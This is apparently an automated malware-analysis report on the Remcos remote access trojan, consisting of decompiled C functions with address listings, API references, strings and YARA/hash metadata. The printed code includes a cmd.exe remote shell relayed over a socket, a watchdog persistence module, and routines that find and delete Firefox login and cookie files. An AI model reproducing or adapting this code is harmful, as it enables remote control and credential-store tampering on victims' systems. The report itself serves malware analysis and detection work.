				_t162 =  *0x46dad6 - _t101; // 0x0
				if(_t162 != 0) {
					L11:
					_v12 = _t101;
					PeekNamedPipe( *0x46fe60, _t101, _t101, _t101,  &_v12, _t101);
					if(_v12 <= _t101) {
						_t156 = _t156 - 0x18;
						E00402076(_t101, _t156, 0x460734);
						_push(0x62);
						_t147 = E00404BB7(_t101, 0x46fdd8, _t140, __eflags);
						goto L21;
					}
					_push(_v12);
					_t60 = E0043776E(_t103);
					_v20 = _t60;
					ReadFile( *0x46fe60, _t60, _v12,  &_v16, _t101);
					if(_v16 <= _t101) {
						L19:
						L00437769(_v20);
						goto L21;
					}
					if(_v8 <= _t101) {
						_t148 = _v20;
						L17:
						E00402076(_t101,  &_v68, _t148);
						_t156 = _t156 - 0x18;
						_t111 = _t156;
						_push(_v16);
						_push(_t101);
						L18:
						E00405BC0(_t101, _t111, _t140, _t171);
						_t147 = E00404BB7(_t101, 0x46fdd8, _t140, _t171, 0x62,  &_v68);
						E00401FB9();
						goto L19;
					}
					_t68 = E00401F87( &_v44);
					_t148 = _v20;
					_t69 = E00437780(_v20, _t68, _v8);
					_t156 = _t156 + 0xc;
					_t171 = _t69;
					if(_t69 != 0) {
						goto L17;
					}
					E00402076(_t101,  &_v68, _t148);
					_t156 = _t156 - 0x18;
					_t111 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t140 = "cmd.exe";
					_t73 = E00405C1B("cmd.exe");
					_t163 = _t73;
					if(_t73 == 0) {
						L26:
						E00404F18(0x46fdd8, _t140);
						CloseHandle( *0x46fe60);
						CloseHandle( *0x46fe7c);
						 *0x46dad6 = _t101;
						_t101 = 1;
						L27:
						E00401FB9();
						E00401FB9();
						return _t101;
					}
					E00405BB7(_t101, 0x46fe80, E00437AFA(_t101, _t163, "SystemDrive"));
					E00405479(_t101, 0x46fe80, CloseHandle, "\\");
					0x46fd80->nLength = 0xc;
					 *0x46fd88 = 1;
					 *0x46fd84 = _t101;
					if(CreatePipe(0x46fe74, 0x46fe5c, 0x46fd80, _t101) == 0 || CreatePipe(0x46fe60, 0x46fe7c, 0x46fd80, _t101) == 0) {
						goto L27;
					} else {
						_t152 = 0x44;
						E00432D80(CloseHandle, 0x46fd90, _t101, CreatePipe);
						0x46fd90->cb = _t152;
						 *0x46fdbc = 0x101;
						 *0x46fdc0 = 0;
						 *0x46fdc8 =  *0x46fe74;
						_t82 =  *0x46fe7c;
						 *0x46fdcc = _t82;
						 *0x46fdd0 = _t82;
						_t83 = E00401F87(0x46fe80);
						_t85 = CreateProcessA(_t101, E00401F87(0x46e300), _t101, _t101, 1, _t101, _t101, _t83, 0x46fd90, 0x46fe64);
						_t166 = _t85;
						 *0x46dad6 = _t85 != 0;
						E00405BB7(_t101, 0x46e300, 0x460734);
						 *0x46dad7 = 1;
						E00404943(0x46fdd8);
						E004049DE(0x46fdd8, 0x46fdd8, 0x46fdd8);
						_t156 = _t156 + 0xc - 0x18;
						E004020DE(_t101, _t156, "cmd.exe", _t85,  &_a4);
						_push(0x93);
						_t103 = 0x46fdd8;
						_t147 = E00404BB7(_t101, 0x46fdd8, _t140, _t166);
						Sleep(0x12c);
						_t167 =  *0x46dad6 - _t101; // 0x0
						if(_t167 == 0) {
							goto L26;
						} else {
							goto L11;
						}
						do {
							goto L11;
							L21:
							_t42 =  <=  ? 0 :  *0x46dad7 & 0x000000ff;
							_t103 = 0x46e300;
							 *0x46dad7 =  <=  ? 0 :  *0x46dad7 & 0x000000ff;
							if(E0040247B() == 0) {
								_v8 = _t101;
							} else {
								E00405479(_t101, 0x46e300, _t143, "\n");
								E00401F9F( &_v44, 0x46e300);
								_t56 = E0040247B();
								WriteFile( *0x46fe5c, E00401F87(0x46e300), _t56,  &_v8, _t101);
								_t103 = 0x46e300;
								E00405BB7(_t101, 0x46e300, 0x460734);
							}
							Sleep(0x64);
							_t174 =  *0x46dad7 - _t101; // 0x0
						} while (_t174 != 0);
						TerminateProcess(0x46fe64->hProcess, _t101);
						CloseHandle( *0x46fe68);
						CloseHandle( *0x46fe64);
						goto L26;
					}
				}
			}
































                                                                                                0x004057ac
                                                                                                0x004057b0
                                                                                                0x004057b2
                                                                                                0x004057b4
                                                                                                0x004057bc
                                                                                                0x004057c4
                                                                                                0x004057cb
                                                                                                0x004057d1
                                                                                                0x004057d7
                                                                                                0x004057df
                                                                                                0x004057e9
                                                                                                0x004057ee
                                                                                                0x004057f5
                                                                                                0x004057fa
                                                                                                0x004057d7
                                                                                                0x00405806
                                                                                                0x0040580e
                                                                                                0x00405814
                                                                                                0x0040581a
                                                                                                0x00405821
                                                                                                0x0040582b
                                                                                                0x00405832
                                                                                                0x00405837
                                                                                                0x0040581a
                                                                                                0x00405838
                                                                                                0x0040583b
                                                                                                0x00405840
                                                                                                0x00405846
                                                                                                0x00405849
                                                                                                0x0040584f
                                                                                                0x004059b9
                                                                                                0x004059bd
                                                                                                0x004059ca
                                                                                                0x004059d3
                                                                                                0x00405a79
                                                                                                0x00405a83
                                                                                                0x00405a88
                                                                                                0x00405a94
                                                                                                0x00000000
                                                                                                0x00405a94
                                                                                                0x004059d9
                                                                                                0x004059dc
                                                                                                0x004059e6
                                                                                                0x004059f4
                                                                                                0x004059fd
                                                                                                0x00405a6e
                                                                                                0x00405a71
                                                                                                0x00000000
                                                                                                0x00405a76
                                                                                                0x00405a02
                                                                                                0x00405a3a
                                                                                                0x00405a3d
                                                                                                0x00405a41
                                                                                                0x00405a46
                                                                                                0x00405a49
                                                                                                0x00405a4b
                                                                                                0x00405a4e
                                                                                                0x00405a4f
                                                                                                0x00405a53
                                                                                                0x00405a67
                                                                                                0x00405a69
                                                                                                0x00000000
                                                                                                0x00405a69
                                                                                                0x00405a0a
                                                                                                0x00405a0f
                                                                                                0x00405a14
                                                                                                0x00405a19
                                                                                                0x00405a1c
                                                                                                0x00405a1e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405a24
                                                                                                0x00405a2f
                                                                                                0x00405a32
                                                                                                0x00405a34
                                                                                                0x00405a35
                                                                                                0x00000000
                                                                                                0x00405855
                                                                                                0x00405855
                                                                                                0x0040585f
                                                                                                0x00405864
                                                                                                0x00405866
                                                                                                0x00405b3f
                                                                                                0x00405b44
                                                                                                0x00405b4f
                                                                                                0x00405b57
                                                                                                0x00405b59
                                                                                                0x00405b5f
                                                                                                0x00405b61
                                                                                                0x00405b64
                                                                                                0x00405b6c
                                                                                                0x00405b79
                                                                                                0x00405b79
                                                                                                0x0040587f
                                                                                                0x0040588b
                                                                                                0x004058a6
                                                                                                0x004058b0
                                                                                                0x004058ba
                                                                                                0x004058c4
                                                                                                0x00000000
                                                                                                0x004058e4
                                                                                                0x004058e6
                                                                                                0x004058ee
                                                                                                0x004058f6
                                                                                                0x004058fe
                                                                                                0x00405908
                                                                                                0x0040591d
                                                                                                0x00405922
                                                                                                0x0040592c
                                                                                                0x00405931
                                                                                                0x00405936
                                                                                                0x00405950
                                                                                                0x00405956
                                                                                                0x0040595f
                                                                                                0x00405966
                                                                                                0x00405970
                                                                                                0x00405979
                                                                                                0x00405981
                                                                                                0x00405986
                                                                                                0x0040598f
                                                                                                0x00405994
                                                                                                0x00405999
                                                                                                0x004059a5
                                                                                                0x004059a7
                                                                                                0x004059ad
                                                                                                0x004059b3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004059b9
                                                                                                0x00000000
                                                                                                0x00405a96
                                                                                                0x00405aa1
                                                                                                0x00405aa4
                                                                                                0x00405aa9
                                                                                                0x00405ab5
                                                                                                0x00405b0b
                                                                                                0x00405ab7
                                                                                                0x00405ac1
                                                                                                0x00405ace
                                                                                                0x00405add
                                                                                                0x00405af4
                                                                                                0x00405aff
                                                                                                0x00405b04
                                                                                                0x00405b04
                                                                                                0x00405b10
                                                                                                0x00405b16
                                                                                                0x00405b16
                                                                                                0x00405b29
                                                                                                0x00405b35
                                                                                                0x00405b3d
                                                                                                0x00000000
                                                                                                0x00405b3d
                                                                                                0x004058c4

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004057F5
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                • __Init_thread_footer.LIBCMT ref: 00405832
                                                                                                • CreatePipe.KERNEL32(0046FE74,0046FE5C,0046FD80,00000000,0046074C,00000000), ref: 004058C0
                                                                                                • CreatePipe.KERNEL32(0046FE60,0046FE7C,0046FD80,00000000), ref: 004058DA
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046FD90,0046FE64), ref: 00405950
                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 004059A7
                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059CA
                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004059F4
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046E300,00460750,00000062,00460734), ref: 00405AF4
                                                                                                  • Part of subcall function 004301F3: __onexit.LIBCMT ref: 004301F9
                                                                                                • Sleep.KERNEL32(00000064,00000062,00460734), ref: 00405B10
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405B29
                                                                                                • CloseHandle.KERNEL32 ref: 00405B35
                                                                                                • CloseHandle.KERNEL32 ref: 00405B3D
                                                                                                • CloseHandle.KERNEL32 ref: 00405B4F
                                                                                                • CloseHandle.KERNEL32 ref: 00405B57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                • String ID: SystemDrive$cmd.exe
                                                                                                • API String ID: 2994406822-3633465311
                                                                                                • Opcode ID: f3c5ffdd50d09cf36f876653c701838baa820f740dc9857a7c617ea70b4f690e
                                                                                                • Instruction ID: 48659864446c9a7ff021c0de4bd636dfa13afc93547c7ec003e93ee943616f91
                                                                                                • Opcode Fuzzy Hash: f3c5ffdd50d09cf36f876653c701838baa820f740dc9857a7c617ea70b4f690e
                                                                                                • Instruction Fuzzy Hash: D291D571A04214ABDB00BBA5EC55D6E3B69EB40708B10007BF542B72E2EBB96D44CF5E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040FB05, Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 194threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E0040FB05(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E004020C7(0x46e5a8,  &_v100);
						E004183CC(E00401EDD(0x46e590),  &_v100);
						E00401F5F(0x46e5a8,  &_v124);
						__eflags = E00418004( &_v124);
						if(__eflags != 0) {
							_t35 = E00404260(0x46e5a8,  &_v76, L"\\SysWOW64");
							E00401EEC( &_v132, _t37, _t142, E00403022( &_v36, E00404260(0x46e5a8,  &_v56, E00437AEF(0x46e5a8,  &_v76, __eflags, L"WinDir")), _t35));
							E00401EE2();
							E00401EE2();
						} else {
							_t61 = E00404260(0x46e5a8,  &_v28, L"\\system32");
							E00401EEC( &_v132, _t63, _t142, E00403022( &_v84, E00404260(0x46e5a8,  &_v56, E00437AEF(0x46e5a8,  &_v28, __eflags, L"WinDir")), _t61));
							E00401EE2();
							E00401EE2();
						}
						E00401EE2();
						E0040778C(0x46e5a8,  &_v124, 0, L"\\svchost.exe");
						_t143 = E00401F87( &_v104);
						_t46 = E00414B29(E00401EDD( &_v128), _t143, 0x46dd44);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00402076(0x46e5a8, _t107, "Watchdog module activated");
							E00402076(0x46e5a8, _t150 - 0x18, "i");
							E00417670(0x46e5a8, 0);
							Sleep(0x7d0);
							_t112 =  *0x46dd4c; // 0x0
							goto L13;
						}
						E00402076(0x46e5a8, _t107, "Watchdog launch failed!");
						E00402076(0x46e5a8, _t150 - 0x18, "E");
						E00417670(0x46e5a8, 0);
						CloseHandle( *0x46dd54);
						E00401EE2();
						E00401FB9();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00402076(0x46e5a8, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00402076(0x46e5a8, _t155 - 0x18, "i");
						E00417670(0x46e5a8, 0);
						E00402076(0x46e5a8, _t156 + 0x18, "Watchdog module activated");
						E00402076(0x46e5a8, _t156 + 0x18 - 0x18, "i");
						E00417670(0x46e5a8, 0);
						CreateThread(0, 0, E00410137, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E004108B4(E00401F87(0x46e5a8), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46dd44 = OpenProcess(0x1fffff, 0, _v132);
							E00410D11(E00401F87(0x46e5a8), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46dd42;
							if(__eflags != 0) {
								E0040FB05(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}





































                                                                                                0x0040fb0b
                                                                                                0x0040fb0f
                                                                                                0x0040fb11
                                                                                                0x0040fb34
                                                                                                0x0040fb4b
                                                                                                0x0040fb51
                                                                                                0x0040fb53
                                                                                                0x0040fbe2
                                                                                                0x0040fbf7
                                                                                                0x0040fc00
                                                                                                0x0040fc0a
                                                                                                0x0040fc0c
                                                                                                0x0040fc69
                                                                                                0x0040fc95
                                                                                                0x0040fc9e
                                                                                                0x0040fca7
                                                                                                0x0040fc0e
                                                                                                0x0040fc17
                                                                                                0x0040fc43
                                                                                                0x0040fc4c
                                                                                                0x0040fc55
                                                                                                0x0040fc5a
                                                                                                0x0040fcb0
                                                                                                0x0040fcbe
                                                                                                0x0040fcd5
                                                                                                0x0040fce0
                                                                                                0x0040fce6
                                                                                                0x0040fce9
                                                                                                0x0040fceb
                                                                                                0x0040fced
                                                                                                0x0040fcf4
                                                                                                0x0040fd03
                                                                                                0x0040fd08
                                                                                                0x0040fd15
                                                                                                0x0040fd1b
                                                                                                0x00000000
                                                                                                0x0040fd1b
                                                                                                0x0040fd28
                                                                                                0x0040fd37
                                                                                                0x0040fd3c
                                                                                                0x0040fd4a
                                                                                                0x0040fd54
                                                                                                0x0040fd5d
                                                                                                0x0040fd62
                                                                                                0x0040fd64
                                                                                                0x0040fb59
                                                                                                0x0040fb5a
                                                                                                0x0040fb60
                                                                                                0x0040fb6a
                                                                                                0x0040fb6f
                                                                                                0x0040fb7a
                                                                                                0x0040fb7f
                                                                                                0x0040fb8e
                                                                                                0x0040fb99
                                                                                                0x0040fb9e
                                                                                                0x0040fbb0
                                                                                                0x0040fbba
                                                                                                0x0040fbca
                                                                                                0x0040fbd1
                                                                                                0x0040fbd3
                                                                                                0x00000000
                                                                                                0x0040fbd9
                                                                                                0x0040fd81
                                                                                                0x0040fd8d
                                                                                                0x0040fd93
                                                                                                0x0040fd97
                                                                                                0x0040fd97
                                                                                                0x0040fd9c
                                                                                                0x0040fd9d
                                                                                                0x0040fd9e
                                                                                                0x0040fd9f
                                                                                                0x0040fda1
                                                                                                0x0040fdaf
                                                                                                0x0040fdb4
                                                                                                0x0040fdbb
                                                                                                0x0040fdc1
                                                                                                0x0040fdc8
                                                                                                0x0040fdcc
                                                                                                0x0040fdcc
                                                                                                0x00000000
                                                                                                0x0040fdc8
                                                                                                0x00000000
                                                                                                0x0040fbd3
                                                                                                0x0040fb36
                                                                                                0x0040fb36
                                                                                                0x0040fb38
                                                                                                0x0040fd6b
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FB11
                                                                                                  • Part of subcall function 00410BDF: RegCreateKeyA.ADVAPI32(80000001,00000000,00460734), ref: 00410BED
                                                                                                  • Part of subcall function 00410BDF: RegSetValueExA.ADVAPI32(00460734,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A69E,00460F78,00000001,000000AF,00460734), ref: 00410C08
                                                                                                  • Part of subcall function 00410BDF: RegCloseKey.ADVAPI32(00460734,?,?,?,0040A69E,00460F78,00000001,000000AF,00460734), ref: 00410C13
                                                                                                • OpenMutexA.KERNEL32 ref: 0040FB4B
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB5A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00410137,00000000,00000000,00000000), ref: 0040FBB0
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD78
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64$\svchost.exe$\system32
                                                                                                • API String ID: 3018269243-1741345798
                                                                                                • Opcode ID: 2886b422811ca8092402f0a6ac9f4f1ef6b55b0c540f70e3be7190a8f89610cd
                                                                                                • Instruction ID: fdc96c652a9365d98c3a529de633bd4b0e23c82eb85e7c32280dbd54f168b04c
                                                                                                • Opcode Fuzzy Hash: 2886b422811ca8092402f0a6ac9f4f1ef6b55b0c540f70e3be7190a8f89610cd
                                                                                                • Instruction Fuzzy Hash: AE51C531A0430167C214FB72DC5BD6E77A89E8175DF20043FF942661E2EEB89949C6AF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040A047, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E0040A047(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E004020C7(__ebx,  &_v100);
				E004020C7(__ebx,  &_v76);
				E004020C7(__ebx,  &_v28);
				_t45 = E00402076(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FC3( &_v28, _t46, _t135, E004053F2(_t89,  &_v52, E00437AFA(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				E00401FB9();
				E00401FB9();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(E00401F87(E004076DF( &_v124,  &_v28, _t142, "*")),  &_v468);
				E00401FB9();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									E00401FC3( &_v100, _t61, _t136, E004076BB(_t89,  &_v52, E004076DF( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									E00401FB9();
									E00401FB9();
									_t128 = E004076DF( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									E00401FC3( &_v76, _t67, _t136, E004076BB(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									E00401FB9();
									E00401FB9();
									_t73 = DeleteFileA(E00401F87( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(E00401F87( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00402076(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E0040A724(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00402076(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E0040A724(_t89,  &_v28, _t143);
					L17:
					E00401FB9();
					E00401FB9();
					E00401FB9();
					return 1;
				}
			}

























                                                                                                0x0040a047
                                                                                                0x0040a047
                                                                                                0x0040a047
                                                                                                0x0040a054
                                                                                                0x0040a05c
                                                                                                0x0040a064
                                                                                                0x0040a071
                                                                                                0x0040a091
                                                                                                0x0040a099
                                                                                                0x0040a0a1
                                                                                                0x0040a0b2
                                                                                                0x0040a0cf
                                                                                                0x0040a0d1
                                                                                                0x0040a0d6
                                                                                                0x0040a0d9
                                                                                                0x0040a20f
                                                                                                0x0040a20f
                                                                                                0x0040a21d
                                                                                                0x0040a21f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a102
                                                                                                0x0040a109
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a10f
                                                                                                0x0040a115
                                                                                                0x0040a118
                                                                                                0x0040a126
                                                                                                0x0040a126
                                                                                                0x0040a12c
                                                                                                0x0040a12c
                                                                                                0x0040a12e
                                                                                                0x0040a12e
                                                                                                0x0040a132
                                                                                                0x0040a137
                                                                                                0x0040a13a
                                                                                                0x0040a140
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a142
                                                                                                0x0040a143
                                                                                                0x0040a146
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a148
                                                                                                0x0040a151
                                                                                                0x0040a151
                                                                                                0x0040a153
                                                                                                0x0040a183
                                                                                                0x0040a18b
                                                                                                0x0040a196
                                                                                                0x0040a1b3
                                                                                                0x0040a1c5
                                                                                                0x0040a1d0
                                                                                                0x0040a1d8
                                                                                                0x0040a1e6
                                                                                                0x0040a1ec
                                                                                                0x0040a1ee
                                                                                                0x0040a1f0
                                                                                                0x0040a1f0
                                                                                                0x0040a1ff
                                                                                                0x0040a205
                                                                                                0x0040a207
                                                                                                0x0040a209
                                                                                                0x0040a209
                                                                                                0x0040a207
                                                                                                0x00000000
                                                                                                0x0040a153
                                                                                                0x0040a14c
                                                                                                0x0040a14e
                                                                                                0x0040a14e
                                                                                                0x00000000
                                                                                                0x0040a14e
                                                                                                0x0040a11e
                                                                                                0x0040a120
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a120
                                                                                                0x0040a22f
                                                                                                0x0040a234
                                                                                                0x0040a23d
                                                                                                0x00000000
                                                                                                0x0040a0df
                                                                                                0x0040a0e0
                                                                                                0x0040a0f0
                                                                                                0x0040a0f5
                                                                                                0x0040a243
                                                                                                0x0040a246
                                                                                                0x0040a24e
                                                                                                0x0040a256
                                                                                                0x0040a261
                                                                                                0x0040a261

                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A0C6
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A0E0
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040A217
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A23D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                • API String ID: 1164774033-3681987949
                                                                                                • Opcode ID: 560460167a3b74f6031a92c36ca8f67955c33202d556ce5097b1ea10add73373
                                                                                                • Instruction ID: 1a82a04086bb8537bde070ddbd888ea8d6581ef07c280fc06d4a0d33395de579
                                                                                                • Opcode Fuzzy Hash: 560460167a3b74f6031a92c36ca8f67955c33202d556ce5097b1ea10add73373
                                                                                                • Instruction Fuzzy Hash: 45515D709102195ACB14F7A5DC56EEEB768AF11308F1001BEF406761E2EF789A89CA5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040A262, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E0040A262(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E004020C7(0,  &_v52);
				E004020C7(0,  &_v28);
				_t35 = E00402076(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FC3( &_v28, _t36, _t109, E004053F2(0,  &_v76, E00437AFA(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				E00401FB9();
				E00401FB9();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(E00401F87(E004076DF( &_v100,  &_v28, _t116, "*")),  &_v444);
				E00401FB9();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E00402076(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						E0040A724(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
